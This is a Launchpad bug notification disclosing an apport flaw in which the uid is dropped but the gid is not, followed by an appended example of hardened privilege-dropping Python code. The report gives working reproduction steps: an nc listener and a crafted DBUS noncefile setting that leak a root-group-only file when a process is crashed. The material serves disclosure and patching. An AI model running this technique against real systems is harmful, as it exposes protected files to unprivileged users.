** Information type changed from Private Security to Public Security

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1885633

Title:
  [ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure Vulnerability

Status in apport package in Ubuntu: Fix Released
Status in apport source package in Xenial: Fix Released
Status in apport source package in Bionic: Fix Released
Status in apport source package in Eoan: Confirmed
Status in apport source package in Focal: Fix Released

Bug description:

-- VULNERABILITY DETAILS ------------------------

* Version tested: 18.04.4 LTS amd64 server
* Installer file: ubuntu-18.04.4-live-server-amd64.iso
* Platform tested: -

---

### Analysis

Apport, which is the crash reporter in Ubuntu, will execute gdbus to check whether a pid is in a closing user session. Before executing the binary, it drops privileges to the crashed process's uid. But it doesn't drop the group id, so it can be used to leak a file that is owned by the root group. This means anyone can read a file that can only be read by the root group, but the file size must be 16 bytes.

Reproduce steps:

```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH
zdi@ubuntu:/tmp$
```

The relevant apport code (the fragment quoted in the report; it is Python, not C++):

~~~python
orig_uid = os.geteuid()
os.setresuid(-1, os.getuid(), -1)  # <-- did not set gid
try:
    gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
                              'org.gnome.SessionManager',
                              '-o', '/org/gnome/SessionManager',
                              '-m', 'org.gnome.SessionManager.IsSessionRunning'],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
    (out, err) = gdbus.communicate()
    if err:
        error_log('gdbus call error: ' + err.decode('UTF-8'))
except OSError as e:
    error_log('gdbus call failed, cannot determine running session: ' + str(e))
    return False
finally:
    os.setresuid(-1, orig_uid, -1)
~~~

-- CREDIT ---------------------------------------

This vulnerability was discovered by: Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1885633/+subscriptions
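As an added example (not code from apport or from the report), the privilege drop done the way a setuid helper that spawns a child should do it: supplementary groups and gid first, then uid, all three of each, performed in the child before exec so the parent keeps its own ids, and verified rather than assumed. The vulnerable form from the report is kept beside it for contrast; `hardened_drop`, `run_as` and the other names are mine, and the smoke test drops to the caller's own ids so it also runs unprivileged.

```python
import os
import subprocess
import sys


def vulnerable_drop(target_uid):
    # The pattern from the report: only the effective uid changes. The
    # effective gid stays root, so a child such as gdbus can still open
    # files readable by the root group (the noncefile trick above).
    os.setresuid(-1, target_uid, -1)


def drop_is_complete(resuid, resgid, target_uid, target_gid):
    """True only if real, effective and saved uid AND gid are all the target."""
    return resuid == (target_uid,) * 3 and resgid == (target_gid,) * 3


def hardened_drop(target_uid, target_gid):
    # Order matters: once the uid is no longer 0 the process may no longer be
    # allowed to change its groups, so groups first, then gid, then uid.
    if os.geteuid() == 0:
        os.setgroups([])  # needs CAP_SETGID; only attempted when still root
    os.setresgid(target_gid, target_gid, target_gid)
    os.setresuid(target_uid, target_uid, target_uid)
    # A silent partial drop is exactly this bug class, so verify it.
    if not drop_is_complete(os.getresuid(), os.getresgid(), target_uid, target_gid):
        raise RuntimeError("privilege drop incomplete")


def run_as(argv, target_uid, target_gid):
    """Run argv with every id dropped in the child only; the parent is untouched."""
    return subprocess.run(
        argv, check=True, capture_output=True, text=True, env={},
        preexec_fn=lambda: hardened_drop(target_uid, target_gid))


def child_ids(target_uid, target_gid):
    """Ids as the child actually observes them: (ruid, euid, suid, rgid, egid, sgid)."""
    probe = "import os; print(*os.getresuid(), *os.getresgid())"
    out = run_as([sys.executable, "-c", probe], target_uid, target_gid).stdout
    return tuple(int(x) for x in out.split())


def self_drop_matches():
    """Smoke test: dropping to our own ids must leave the child with exactly them."""
    uid, gid = os.getuid(), os.getgid()
    return child_ids(uid, gid) == (uid,) * 3 + (gid,) * 3
```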